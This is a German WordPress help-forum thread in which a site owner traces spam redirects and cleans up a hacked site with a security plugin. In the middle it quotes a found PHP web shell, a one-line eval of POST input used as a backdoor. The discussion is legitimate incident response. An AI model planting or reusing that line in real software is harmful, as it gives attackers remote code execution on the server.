Amid
(@aminteractiondesign)
Check mal deinen Webspace per FTP.
Womöglich wurde hier das PW „gehacked“ und einfach die html-Dateien hochgeladen.
Du denkst viel zu kompliziert, mit htaccess und so 😉
EDIT: Außerdem hast du noch diverse andere Plugins, nicht nur yoast
-
Diese Antwort wurde vor 9 Jahren, 6 Monaten von
Amid geändert.
Das Yoast war auf „SEO“ bezogen.
Wo genau soll ich das denn checken? Im aktiven Theme? Weil da finde ich nichts verdächtiges…
Zum einen haben wir dafür einen FAQ-Beitrag …
https://de.wordpress.org/support/topic/seite-gehacked-was-tun/
… zum anderen gibt es ausführliche Anleitungen, wie man mit einer gehackten WordPress-Website verfahren sollte, z.B.
https://sucuri.net/guides/how-to-clean-hacked-wordpress (Englisch)
Nur ins Theme zu schauen, ist ein bisschen wenig. Hacker sind meistens etwas cleverer und legen ihren Schadcode nicht dort ab, wo man ihn direkt findet.
Eine Website komplett zu säubern kann schon mal eine Sache von ein paar Stunden sein. Aber jetzt ist ja bald Wochenende, da passt das ja.
Ich weiß ja nicht mal, ob die wiklrich gehackt wurde?
Sonst ist ja alles wie vorher… Und wenn jemand wirklich die Seite gehackt hat, wieso macht er dann „nur“ diese Weiterleitugen?
Amid
(@aminteractiondesign)
Wie würdest du es denn dann nennen, wenn jemand auf deiner Website rumpfuscht, wenn nicht „gehackt“? 🙂
-
Diese Antwort wurde vor 9 Jahren, 6 Monaten von Amid geändert.
Ja, schon richtig.
Ich blick da nciht durch. Sucurix (Ein Hack/Malware-Plugin) zeigt mir keine Fehler. Allerdings „Links“
/tag/hochzeitsreise/
/tag/hochzeitsplanung/
/sites_category/mode/
/sites_category/trauringe/
/zweifarbige-trauringe-unschlagbare-symbolik/
/hochzeitsfotograf-gute-fotos-guter-preis-ewige-erinnerung/
/sites_category/hochzeitsredner/
/sites_category/catering-partyservice/
/lttmnjp/21284.html
/lttmnjp/30819.html
/lttmnjp/1523.html
/lttmnjp/15751.html
Die letzten 4 sind ja die „gehackten“… Allerdings kann ich die nirgends finden. Nicht mal im Quelltext steht was davon..
Allerdings kann ich die nirgends finden. Nicht mal im Quelltext steht was davon..
Dann solltest du jemanden hinzuziehen, der sich damit auskennt. Kostet ein paar Euro, schützt dich aber vor weiterem Schaden (z.B. wenn dein Webserver zum Spambot oder File-Sharing-Plattform wird). Sehe z.B. gerade in Google ein Angebot „Überprüfung und Reparatur auf Stundenbasis, Preis je Stunde 77,35 €“.
Ich will jetzt nicht den Teufel an die Wand malen…
Habe jetzt worfence installiert und der hat mir da einige Dateien angezeigt
u.a. son.php und sun.php Sicher kein Standard…
Und as stand drin: <?php @eval($_POST[gnm]);?>
1 Sekunde gegoogelt. Malware. Lösche das jetzt alles.
-
Diese Antwort wurde vor 9 Jahren, 6 Monaten von
thering geändert.
Das ist richtig krass.
Hätte ich mal Wordfence von Anfang an genutzt.
Habe alle schädlichen Zeilen Code entfernt und Dateien gelöscht. Jetzt sind auch die Weiterleitungen zu diesen Asia-Seiten weg!
In der Live Traffix Übersicht sieht man sogar wie der „Hacker“ versucht sich verzweifelt wieder einzuloggen. Direkt IP geblockt.
Alle PWs von DBs FTP usw erneuert. Sind zufällig generierte. Waren es vorher aber auch…
Heftig.
Unser Serveranbieter will sich die Sache auch nochmal anschauen aber ich denke, dass Problem hat sich somit…
Habe alle schädlichen Zeilen Code entfernt
Der Zeitpunkt ist zu früh, um das mit Sicherheit sagen zu können.
Alle PWs von DBs FTP usw erneuert. Sind zufällig generierte. Waren es vorher aber auch…
Von einem Zufallsgenerator erstellte PWs aus Groß-/Kleinbuchstaben, Zahlen und Sonderzeichen sind ja nicht so einfach zu knacken. Da würde ich an deiner Stelle auch mal den eigenen Rechner auf Malware untersuchen (Stichwort Keylogger etc.).
Ja bin ich gerade dabei.
Muss das jetzt mal beobachten.
Danke für die Hilfe und Hinweise.
„Der Zeitpunkt ist zu früh, um das mit Sicherheit sagen zu können.“
Das sehe ich (leider) auch so.
Wird eine Website gehackt, gibt es in den meisten Fällen auch eine Backdoor.
Solch eine „Backdoor“ wurde auch erkannt von Wordfence und ebenfalls entfernt.
Habe nun die kompletten IPs 192.20.XXX.01 – 192.20.XXX.255 blockieren lassen. Und siese da, alle Zugriffe werden nun geblockt.
Ich werde es jedenfalls jetzt beobachten.
